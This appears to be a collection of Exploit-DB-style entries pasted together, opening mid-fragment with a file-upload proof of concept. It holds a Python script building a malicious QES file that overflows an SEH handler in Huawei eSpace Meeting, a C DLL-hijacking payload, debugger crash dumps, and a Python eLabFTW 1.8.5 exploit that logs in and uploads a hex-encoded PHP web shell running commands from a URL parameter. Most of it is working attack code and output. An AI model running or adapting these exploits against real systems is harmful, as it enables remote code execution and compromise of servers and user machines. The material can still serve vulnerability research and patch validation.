form-data; name="submit" Submit ------WebKitFormBoundaryF2dckZgrcE306kH2- #### POC <!DOCTYPE HTML> <html lang="en-US"> <head> <meta charset="UTF-8"> <title></title> </head> <body> <form action="http://WEBSITE/surveys_submit.php?formId=1337" method="post" enctype="multipart/form-data"> <input type="file" name="widget[0][field][][value]"> <input type="submit" value="submit" name="submit"> </form> </body> </html> URL : http://{{IEM LINK}}/admin/temp/surveys/1337/{{FUZZING NUMBER}}/{{FILENAME}}

#!/usr/bin/env python # -*- coding: utf-8 -*- # # Huawei eSpace Meeting cenwpoll.dll Unicode Stack Buffer Overflow with SEH Overwrite # # # Vendor: Huawei Technologies Co., Ltd. # Product web page: https://www.huawei.com # Affected application: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC) # Affected application: Mobile Office eConference V200R003C01 6.0.0.268.v67290 # Affected module: cenwpoll.dll 1.0.8.8 # Binaries affected: mcstub.exe, classreader.exe, offlinepolledit.exe, eSpace.exe # # Product description: # -------------------- # 1. Create more convenient Enhanced Communications (EC) services for your enterprise with this suite of # products. Huawei’s EC Suite (ECS) solution combines voice, data, video, and service streams, and provides # users with easy and secure access to their service platform from any device, in any place, at any time. # 2. The eSpace Meeting allows you to join meetings that support voice, data, and video functions using # the PC client, the tablet client, or an IP phone, or in a meeting room with an MT deployed. # # Vulnerability description: # -------------------------- # eSpace Meeting is prone to a stack-based buffer overflow vulnerability (seh overwrite) because it fails # to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer when # handling QES files. Attackers can exploit this issue to execute arbitrary code within the context of # the affected application. Failed exploit attempts will likely result in denial-of-service conditions. # # Tested on: # ---------- # OS Name: Microsoft Windows 7 Professional # OS Version: 6.1.7601 Service Pack 1 Build 7601 # RAM 4GB, System type: 32bit, Processor: Intel(R) Core(TM) i5-4300U CPU 1.90GHz 2.50GHz # # Vulnerability discovered by: # ---------------------------- # Gjoko 'LiquidWorm' Krstic # Senior STTE # SCD-ERC # Munich, Germany # 26th of August (Tuesday), 2014 # # PSIRT details: # -------------- # Security advisory No.: Huawei-SA-20141217- espace # Initial release date: Dec 17, 2014 # Vulnerability ID: HWPSIRT-2014-1151 # CVE ID: CVE-2014-9415 # Patched version: eSpace Meeting V100R001C03 # Advisory URL: https://www.huawei.com/en/psirt/security-advisories/hw-406589 # # # ------------------------------------ WinDBG output ------------------------------------ # # m_dwCurrentPos = 0 ,dwData = 591 ,m_dwGrowSize = 4096(1db0.1828): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00000000 ebx=00410041 ecx=00000000 edx=00000578 esi=08de1ad8 edi=00410045 # eip=05790f3e esp=02fc906c ebp=02fecd00 iopl=0 nv up ei pl zr na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 # *** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\cenwpoll.dll # *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\eSpace-ecs\conf\cwbin\cenwpoll.dll - # cenwpoll!DllUnregisterServer+0xa59e: # 05790f3e 8178082c010000 cmp dword ptr [eax+8],12Ch ds:0023:00000008=???????? # 0:008> !exchain # 02feccf4: *** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\mcstub.exe # *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\eSpace-ecs\conf\cwbin\mcstub.exe # mcstub+10041 (00410041) # Invalid exception stack at 00410041 # Instruction Address: 0x0000000005790f3e # # Description: Exception Handler Chain Corrupted # Short Description: ExceptionHandlerCorrupted # Exploitability Classification: EXPLOITABLE # Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at cenwpoll!DllUnregisterServer+0x000000000000a59e (Hash=0xbc5aacab.0x6c23bb0b) # # Corruption of the exception handler chain is considered exploitable # # 0:008> d ebp # 02fecd00 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. # 02fecd10 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. # 02fecd20 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. # 02fecd30 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. # 02fecd40 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. # 02fecd50 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. # 02fecd60 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. # 02fecd70 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. # 0:008> u ebp # 02fecd00 41 inc ecx # 02fecd01 004100 add byte ptr [ecx],al # 02fecd04 41 inc ecx # 02fecd05 004100 add byte ptr [ecx],al # 02fecd08 41 inc ecx # 02fecd09 004100 add byte ptr [ecx],al # 02fecd0c 41 inc ecx # 02fecd0d 004100 add byte ptr [ecx],al # # ------------------------------------ /WinDBG output ------------------------------------ # # import sys, os, time os.system('title jterm') os.system('color f5') os.system('cls') piton = os.path.basename(sys.argv[0]) def usage(): print ''' +---------------------------------------------+ | eSpace Meeting Stack Buffer Overflow Vuln | | | | Vuln ID: HWPSIRT-2014-1151 | | CVE ID: CVE-2014-9415 | +---------------------------------------------+ ''' if len(sys.argv) < 2: print 'Usage: \n\n\t'+piton+' <OPTION>' print '\nOPTION:\n' print '\t0 - Create the evil PoC file.' print '\t1 - Create the evil file, start the vulnerable application and crash it.' print '\t2 - Create the evil file, start the vulnerable application under Windows Debugger with SEH chain info.\n' quit() usage() crash = sys.argv[1] dir = os.getcwd(); file = "evilpoll.qes" header = '\x56\x34\x78\x12\x01\x00\x09\x00' # V4x..... time.sleep(1) # Overwrite FS:[0] chain (\x43 = EIP) buffer = '\x41' * 353 +'\x42' * 2 +'\x43' * 2 +'\x44' * 42 +'New Poll' # \x44 can be incremented (byte space for venetian shellcode) buffer += '\x00\x01\x00\x00\x00\x00\x00\x90' buffer += '\x85\xA9\xD7\x00\x01\x04\x00' buffer += 'TEST'+'\x01\x02\x05\x00' buffer += 'ANSW1'+'\x05\x00' buffer += 'ANSW2' poc = header + buffer bytes = len(poc) print '[+] Creating evil PoC file...' time.sleep(1) print '[+] Buffering:\n' time.sleep(1) index = 0 while index < len(poc): char = poc[index] #print char, sys.stdout.write(char) time.sleep(10.0 / 1000.0) index = index + 1 try: writeFile = open (file, 'w') writeFile.write( poc ) writeFile.close() time.sleep(1) print '\n\n[+] File \"'+file+'\" successfully created!' time.sleep(1) print '[+] Location: "'+dir+'"' print '[+] Wrote '+str(bytes)+' bytes.' except: print '[-] Error while creating file!\n' if crash == '0': print '\n\n[+] Done!\n' elif crash == '1': print '[+] The script will now execute the vulnerable application with the PoC file as its argument.\n' os.system('pause') os.system('C:\\Progra~1\\eSpace-ecs\\conf\\cwbin\\classreader.exe "%~dp0evilpoll.qes"') elif crash == '2': print '[+] The script will now execute the vulnerable application with the PoC file as its argument under Windows Debugger.\n' os.system('pause') os.system('C:\\Progra~1\\Debugg~1\\windbg.exe -Q -g -c "!exchain" -o "C:\\Progra~1\eSpace-ecs\conf\cwbin\classreader.exe" "%~dp0evilpoll.qes"') print '\n[+] You should see something like this in WinDBG:' print ''' 0:000> d 0012e37c 0012e37c 42 00 42 00 43 00 43 00-44 00 44 00 44 00 44 00 B.B.C.C.D.D.D.D. 0012e38c 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D. 0012e39c 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D. 0012e3ac 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D. 0012e3bc 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D. 0012e3cc 44 00 44 00 44 00 44 00-44 00 44 00 4e 00 65 00 D.D.D.D.D.D.N.e. 0012e3dc 77 00 20 00 50 00 6f 00-6c 00 6c 00 00 00 00 00 w. .P.o.l.l..... 0012e3ec c2 01 00 00 56 34 78 12-70 09 87 02 00 00 00 00 ....V4x.p....... 0:000> !exchain 0012e37c: 00430043 Invalid exception stack at 00420042 ''' else: print '[+] Have a nice day! ^^\n' quit() print '\n[+] Have a nice day! ^^\n' #os.system('color 07')

/* Huawei eSpace Desktop DLL Hijacking Vulnerability Vendor: Huawei Technologies Co., Ltd. Product web page: https://www.huawei.com Affected version: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC) Summary: Create more convenient Enhanced Communications (EC) services for your enterprise with this suite of products. Huawei’s EC Suite (ECS) solution combines voice, data, video, and service streams, and provides users with easy and secure access to their service platform from any device, in any place, at any time. The eSpace Meeting allows you to join meetings that support voice, data, and video functions using the PC client, the tablet client, or an IP phone, or in a meeting room with an MT deployed. Desc: eSpace suffers from a DLL Hijacking issue. The vulnerability is caused due to the application loading libraries (mfc71enu.dll, mfc71loc.dll, tcapi.dll and airpcap.dll) in an insecure manner. This can be exploited to load arbitrary libraries by tricking a user into opening a related application file (.html, .jpg, .png) located on a remote WebDAV or SMB share. Tested on: Microsoft Windows 7 Professional Vulnerability discovered by Gjoko 'LiquidWorm' Krstic 19.08.2014 Patched version: V200R003C00 Vuln ID: HWPSIRT-2014-1153 and HWPSIRT-2014-1154 CVE ID: CVE-2014-9416 Advisory: https://www.huawei.com/en/psirt/security-advisories/hw-406589 */ // gcc -shared -o mfc71enu.dll exploit.c #include <windows.h> BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved) { exec(); return 0; } int exec() { WinExec("calc.exe" , SW_NORMAL); return 0; }

Huawei eSpace Meeting Image File Format Handling Buffer Overflow Vulnerability Vendor: Huawei Technologies Co., Ltd. Product web page: https://www.huawei.com Affected version: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC) Summary: Create more convenient Enhanced Communications (EC) services for your enterprise with this suite of products. Huawei’s EC Suite (ECS) solution combines voice, data, video, and service streams, and provides users with easy and secure access to their service platform from any device, in any place, at any time. The eSpace Meeting allows you to join meetings that support voice, data, and video functions using the PC client, the tablet client, or an IP phone, or in a meeting room with an MT deployed. Desc: eSpace Meeting conference whiteboard functionality is vulnerable to a buffer overflow issue when inserting known image file formats. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. Vuln modules (no DEP/ASLR): C:\Program Files\eSpace-ecs\conf\cwbin\classmgr.dll C:\Program Files\eSpace-ecs\conf\cwbin\MiniGDIEx.dll Tested on: Microsoft Windows 7 Professional Vulnerability discovered by Gjoko 'LiquidWorm' Krstic 23.09.2014 Patched version: V100R001C03 Vuln ID: HWPSIRT-2014-1156 CVE ID: CVE-2014-9417 Advisory: https://www.huawei.com/en/psirt/security-advisories/hw-406589 -- Reference magic numbers (hex signature): JPG/JPEG - FF D8 FF BMP - 42 4D PNG - 89 50 4E 47 0D 0A 1A 0A 0:024> g CClassMgrFrameWnd::OnKeyUp lParam = -1072758783Get config of string parameter:box, value: (2110.2258): Unknown exception - code c0000002 (first chance) (2110.2258): Unknown exception - code c0000002 (first chance) (2110.1b08): C++ EH exception - code e06d7363 (first chance) (2110.1b08): C++ EH exception - code e06d7363 (!!! second chance !!!) eax=036de3f4 ebx=01709870 ecx=00000003 edx=00000000 esi=7c380edc edi=036de484 eip=75ae812f esp=036de3f4 ebp=036de444 iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\KERNELBASE.dll - KERNELBASE!RaiseException+0x54: 75ae812f c9 leave 0:008> d esp *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\eSpace-ecs\conf\cwbin\MSVCR71.dll - 036de3f4 63 73 6d e0 01 00 00 00-00 00 00 00 2f 81 ae 75 csm........./..u 036de404 03 00 00 00 20 05 93 19-98 e4 6d 03 30 82 3d 7c .... .....m.0.=| 036de414 00 00 00 00 18 00 00 00-14 33 41 7c 60 e4 6d 03 .........3A|`.m. 036de424 b3 16 34 7c 00 00 9c 01-00 00 00 00 b8 16 34 7c ..4|..........4| 036de434 44 4b 41 7c 98 e4 6d 03-70 98 70 01 98 98 70 01 DKA|..m.p.p...p. 036de444 84 e4 6d 03 ed 9a 35 7c-63 73 6d e0 01 00 00 00 ..m...5|csm..... 036de454 03 00 00 00 78 e4 6d 03-98 98 70 01 54 16 3d 7c ....x.m...p.T.=| 036de464 63 73 6d e0 01 00 00 00-00 00 00 00 00 00 00 00 csm............. 0:008> d 036de474 03 00 00 00 20 05 93 19-98 e4 6d 03 30 82 3d 7c .... .....m.0.=| 036de484 a8 e4 6d 03 5a 8b 3c 7c-98 e4 6d 03 30 82 3d 7c ..m.Z.<|..m.0.=| 036de494 54 2b fc ab 54 16 3d 7c-58 a9 71 01 01 00 00 00 T+..T.=|X.q..... 036de4a4 70 16 3d 7c 3c e8 6d 03-e0 d9 b0 04 00 00 00 00 p.=|<.m......... 036de4b4 66 13 af 04 54 2b fc ab-80 94 6f 01 3c e8 6d 03 f...T+....o.<.m. 036de4c4 30 ed 6d 03 00 00 00 00-ec e4 6d 03 00 00 00 00 0.m.......m..... 036de4d4 0b 00 00 00 00 00 00 00-41 41 41 41 41 41 41 41 ........AAAAAAAA 036de4e4 41 41 41 41 41 41 41 41-28 00 00 00 41 41 00 00 AAAAAAAA(...AA.. 0:008> d 036de4f4 41 41 00 00 41 41 41 41-00 00 00 00 54 2b fc ab AA..AAAA....T+.. 036de504 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 036de514 00 00 00 00 24 ed 6d 03-22 a0 af 76 43 f0 ed 63 ....$.m."..vC..c 036de524 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 036de534 30 ed 6d 03 45 76 58 06-42 4d 00 0d 41 41 41 41 0.m.EvX.BM..AAAA 036de544 41 41 41 41 41 41 6d 03-3b 23 af 04 3c e8 6d 03 AAAAAAm.;#..<.m. 036de554 80 94 6f 01 88 ef 6d 03-05 02 00 00 00 00 00 00 ..o...m......... 036de564 73 00 70 00 84 f2 b0 04-00 00 00 00 00 00 00 00 s.p............. 0:008> d 036de574 42 4d 00 0d 41 41 41 41-41 41 41 41 41 41 41 41 BM..AAAAAAAAAAAA 036de584 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 036de594 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 036de5a4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 036de5b4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 036de5c4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 036de5d4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 036de5e4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA -- PNG Decoder error msg:$s Invalid parameter passed to C runtime function. Invalid parameter passed to C runtime function. (1874.2274): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=015d8998 edx=00000000 esi=015d8ab8 edi=00000000 eip=025f1b99 esp=032ccc88 ebp=032cd0c4 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 *** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\classmgr.dll *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\eSpace-ecs\conf\cwbin\classmgr.dll - classmgr+0x11b99: 025f1b99 8b9868060000 mov ebx,dword ptr [eax+668h] ds:0023:00000668=???????? -- JPEG datastream contains no image Improper call to JPEG library in state 200 (1f88.2768): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=a2afcfb5 edx=00000000 esi=0352e318 edi=000000cc eip=0491b035 esp=0352e2c8 ebp=0352ed30 iopl=0 nv up ei ng nz ac pe cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010297 *** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\MiniGDIEx.DLL *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\eSpace-ecs\conf\cwbin\MiniGDIEx.DLL - MiniGDIEx!DllUnregisterServer+0x2f95: 0491b035 ff10 call dword ptr [eax] ds:0023:00000000=???????? --- PoC files: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46867.zip

# Exploit Title : eLabFTW 1.8.5 'EntityController' Arbitrary File Upload / RCE # Date : 5/18/19 # Exploit Author : liquidsky (JMcPeters) # Vulnerable Software : eLabFTW 1.8.5 # Vendor Homepage : https://www.elabftw.net/ # Version : 1.8.5 # Software Link : https://github.com/elabftw/elabftw # Tested On : Linux / PHP Version 7.0.33 / Default installation (Softaculous) # Author Site : http://incidentsecurity.com | https://github.com/fuzzlove # # Greetz : wetw0rk, offsec ^^ # # Description: eLabFTW 1.8.5 is vulnerable to arbitrary file uploads via the /app/controllers/EntityController.php component. # This may result in remote command execution. An attacker can use a user account to fully compromise the system using a POST request. # This will allow for PHP files to be written to the web root, and for code to execute on the remote server. # # Notes: Once this is done a php shell will drop at https://[targetsite]/[elabftw directory]/uploads/[random 2 alphanum]/[random long alphanumeric].php5?e=whoami # You will have to visit the uploads directory on the site to see what the name is. However there is no protection against directory listing. # So this can be done by an attacker remotely. #!/usr/bin/env python import requests from bs4 import BeautifulSoup as bs4 requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) import sys import time print "+-------------------------------------------------------------+" print print "- eLabFTW 1.8.5 'EntityController' Arbitrary File Upload / RCE" print print "- Discovery / PoC by liquidsky (JMcPeters) ^^" print print "+-------------------------------------------------------------+" try: target = sys.argv[1] email = sys.argv[2] password = sys.argv[3] directory = sys.argv[4] except IndexError: print "- Usage: %s <target> <email> <password> <directory>" % sys.argv[0] print "- Example: %s incidentsecurity.com [email protected] mypassword elabftw" % sys.argv[0] sys.exit() proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} # The payload to send data = "" data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x37" data += "\x32\x31\x36\x37\x35\x39\x38\x31\x31\x30\x38\x37\x34\x35\x39" data += "\x34\x31\x31\x31\x36\x33\x30\x33\x39\x35\x30\x37\x37\x0d\x0a" data += "\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69" data += "\x74\x69\x6f\x6e\x3a\x20\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61" data += "\x3b\x20\x6e\x61\x6d\x65\x3d\x22\x75\x70\x6c\x6f\x61\x64\x22" data += "\x0d\x0a\x0d\x0a\x74\x72\x75\x65\x0d\x0a\x2d\x2d\x2d\x2d\x2d" data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x37\x32\x31\x36\x37\x35" data += "\x39\x38\x31\x31\x30\x38\x37\x34\x35\x39\x34\x31\x31\x31\x36" data += "\x33\x30\x33\x39\x35\x30\x37\x37\x0d\x0a\x43\x6f\x6e\x74\x65" data += "\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a" data += "\x20\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x20\x6e\x61\x6d" data += "\x65\x3d\x22\x69\x64\x22\x0d\x0a\x0d\x0a\x34\x0d\x0a\x2d\x2d" data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x37\x32\x31" data += "\x36\x37\x35\x39\x38\x31\x31\x30\x38\x37\x34\x35\x39\x34\x31" data += "\x31\x31\x36\x33\x30\x33\x39\x35\x30\x37\x37\x0d\x0a\x43\x6f" data += "\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69" data += "\x6f\x6e\x3a\x20\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x20" data += "\x6e\x61\x6d\x65\x3d\x22\x74\x79\x70\x65\x22\x0d\x0a\x0d\x0a" data += "\x65\x78\x70\x65\x72\x69\x6d\x65\x6e\x74\x73\x0d\x0a\x2d\x2d" data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x37\x32\x31" data += "\x36\x37\x35\x39\x38\x31\x31\x30\x38\x37\x34\x35\x39\x34\x31" data += "\x31\x31\x36\x33\x30\x33\x39\x35\x30\x37\x37\x0d\x0a\x43\x6f" data += "\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69" data += "\x6f\x6e\x3a\x20\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x20" data += "\x6e\x61\x6d\x65\x3d\x22\x66\x69\x6c\x65\x22\x3b\x20\x66\x69" data += "\x6c\x65\x6e\x61\x6d\x65\x3d\x22\x70\x6f\x63\x33\x2e\x70\x68" data += "\x70\x35\x22\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79" data += "\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e" data += "\x2f\x78\x2d\x70\x68\x70\x0d\x0a\x0d\x0a\x3c\x3f\x70\x68\x70" data += "\x20\x65\x63\x68\x6f\x20\x73\x68\x65\x6c\x6c\x5f\x65\x78\x65" data += "\x63\x28\x24\x5f\x47\x45\x54\x5b\x27\x65\x27\x5d\x2e\x27\x20" data += "\x32\x3e\x26\x31\x27\x29\x3b\x20\x3f\x3e\x0d\x0a\x2d\x2d\x2d" data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x37\x32\x31\x36" data += "\x37\x35\x39\x38\x31\x31\x30\x38\x37\x34\x35\x39\x34\x31\x31" data += "\x31\x36\x33\x30\x33\x39\x35\x30\x37\x37\x2d\x2d\x0d\x0a" s = requests.Session() print "[*] Visiting eLabFTW Site" r = s.get('https://' + target + '/' + directory + '/login.php',verify=False) print "[x]" # Grabbing token html_bytes = r.text soup = bs4(html_bytes, 'lxml') token = soup.find('input', {'name':'formkey'})['value'] values = {'email': email, 'password': password, 'formkey': token,} time.sleep(2) print "[*] Logging in to eLabFTW" r = s.post('https://' + target + '/' + directory + '/app/controllers/LoginController.php', data=values, verify=False) print "[x] Logged in :)" time.sleep(2) sessionId = s.cookies['PHPSESSID'] headers = { #POST /elabftw/app/controllers/EntityController.php HTTP/1.1 #Host: incidentsecurity.com "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "application/json", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", #Referer: https://incidentsecurity.com "Cache-Control": "no-cache", "X-Requested-With": "XMLHttpRequest", "Content-Length": "588", "Content-Type": "multipart/form-data; boundary=---------------------------72167598110874594111630395077", "Connection": "close", "Cookie": "PHPSESSID=" + sessionId + ";" + "token=" + token } print "[*] Sending payload..." r = s.post('https://' + target + '/' + directory + '/app/controllers/EntityController.php',verify=False, headers=headers, data=data) print "[x] Payload sent" print print "Now check https://%s/%s/uploads" % (target, directory) print "Your php shell will be there under a random name (.php5)" print print "i.e https://[vulnerable site]/elabftw/uploads/60/6054a32461de6294843b7f7ea9ea2a34a19ca420752b087c87011144fc83f90b9aa5bdcdce5dee132584f6da45b7ec9e3841405e9d67a7d196f064116cf2da38.php5?e=whoami"